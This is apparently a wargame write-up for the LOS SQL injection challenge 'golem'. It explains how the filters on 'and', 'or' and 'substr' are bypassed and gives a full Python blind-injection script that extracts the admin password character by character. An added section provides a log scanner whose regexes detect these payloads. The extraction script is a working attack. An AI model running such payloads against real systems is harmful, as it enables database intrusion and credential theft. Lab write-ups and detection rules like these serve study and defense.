11. LOS - golem
2018. 8. 8. 13:04 · WarGame/LOS
This is LOS problem 11, golem.
Looking at what changed from the previous problems: or and and were already being filtered, and now substr is filtered as well..
A quick Google search says substr can be replaced with mid.
When and is filtered, use and = %26%26 (the URL-encoded form of &&).
Here is the payload.
```python
import requests
import string

num_alpha = string.digits + string.ascii_letters
password = ""

# target: the golem challenge page (URL as given in this writeup)
resetURL = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php"
# input your cookie (grin)
cookies = dict(PHPSESSID="dvs710ccqajrn9434hc3a00r11")

# step 1: find the length of pw
# `and` is filtered, so `&&` is sent URL-encoded as %26%26; the trailing %23 (`#`)
# comments out the rest of the query
for i in range(1, 20):
    try:
        URL = resetURL
        payload = "?pw=1' || id like'admin' %26%26 LENGTH(pw) like " + str(i) + "%23"
        URL += payload
        response = requests.get(URL, cookies=cookies)
        print("[O] \n" + str(i) + ". connect success!!")
    except requests.RequestException:
        print("[X] Error Code...OTL")
        continue  # no response to inspect for this length
    # the page renders an <h2> only when the injected condition is true
    if response.text.find("</h2>") > 0:
        print("passwd's length is : " + str(i) + "(grin)")
        break

# step 2: extract pw one character at a time
# substr is filtered, so mid() is used instead; the loop bound is the length
# found above (hard-coded as 8 here)
for i in range(1, 9):
    # ord("0") = 48 ... ord("Z") = 90
    for j in num_alpha:
        URL = resetURL
        payload = ("?pw=1' || id like'admin' %26%26 ascii(mid(pw," + str(i)
                   + ", 1)) like " + str(ord(j)) + "%23")
        URL += payload
        response = requests.get(URL, cookies=cookies)
        if response.text.find("</h2>") > 0:
            password += j
            print(str(i) + "'s password is : " + j)
            break

# step 3: when you have the password, submit it
print(password)
URL = resetURL + "?pw=" + password
response = requests.get(URL, cookies=cookies)
print(response.text)
```
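The same probes seen from the server side: the script above issues one request per length guess and one per candidate character, every one of them carrying a quote followed by a boolean operator, a mid()/ascii()/LENGTH() comparison, and a trailing comment, with the `&&` and `#` only hidden from a keyword filter by URL encoding. The following Python scanner is an added example (not part of the original writeup) that decodes query parameters from constructed Common Log Format lines before matching, so `%26%26` is judged as `&&`, and flags a parameter once two independent indicators co-occur. The log lines, IPs and the threshold are assumptions made up for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not taken from the page). The first two
# query strings mirror the shape of the writeup's probes; the last two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Aug/2018:13:04:01 +0900] "GET /golem.php?pw=1'%20||%20id%20like'admin'%20%26%26%20LENGTH(pw)%20like%208%23 HTTP/1.1" 200 512
10.0.0.5 - - [08/Aug/2018:13:04:02 +0900] "GET /golem.php?pw=1'%20||%20id%20like'admin'%20%26%26%20ascii(mid(pw,1,%201))%20like%2055%23 HTTP/1.1" 200 512
10.0.0.9 - - [08/Aug/2018:13:05:00 +0900] "GET /golem.php?pw=hunter2 HTTP/1.1" 200 480
10.0.0.7 - - [08/Aug/2018:13:06:10 +0900] "GET /index.php?page=2&&sort=asc HTTP/1.1" 200 1024
"""

# Common Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# Indicators are matched against the *decoded* parameter value, so %26%26 is
# seen as "&&" and %23 as "#" regardless of how the client encoded them.
INDICATORS = {
    "quote_then_boolean": re.compile(r"'\s*(\|\||&&|or\b|and\b)", re.I),
    "char_extract": re.compile(r"\b(mid|substr|substring)\s*\(", re.I),
    "ascii_compare": re.compile(r"\bascii\s*\(.*\)\s*(like|=|<|>)\s*\d+", re.I),
    "length_compare": re.compile(r"\blength\s*\(.*\)\s*(like|=|<|>)\s*\d+", re.I),
    "trailing_comment": re.compile(r"(#|--\s|/\*)\s*$"),
}
FLAG_THRESHOLD = 2  # assumed: two independent indicators in one value is a hit


def parse_line(line):
    """Split one log line into client IP, path and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl splits on the literal '&' first and only then percent-decodes
    # each value, so an encoded %26%26 stays inside the parameter it belongs to.
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {"ip": m.group("ip"), "path": parts.path, "params": params}


def classify_value(value):
    """Return the names of all indicators that match a decoded parameter value."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def scan_log(text):
    """Return one finding per flagged parameter, in log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            hits = classify_value(value)
            if len(hits) >= FLAG_THRESHOLD:
                findings.append({"ip": rec["ip"], "path": rec["path"],
                                 "param": name, "decoded": value, "indicators": hits})
    return findings


def hits_by_ip(findings):
    """Count flagged requests per client; a character-by-character extraction
    shows up as many hits from one address against one parameter."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["path"], f["param"], f["indicators"], repr(f["decoded"]))
    print(hits_by_ip(found))
```

Matching on decoded values is what makes the keyword-bypass in the writeup visible: the filter in the challenge looks for `and` and `substr` in the raw input, while the scanner sees `&&` and `mid(` after decoding and treats them as the same operators. The benign `page=2&&sort=asc` line is not flagged because the `&&` there is a parameter separator, not a boolean after a quote.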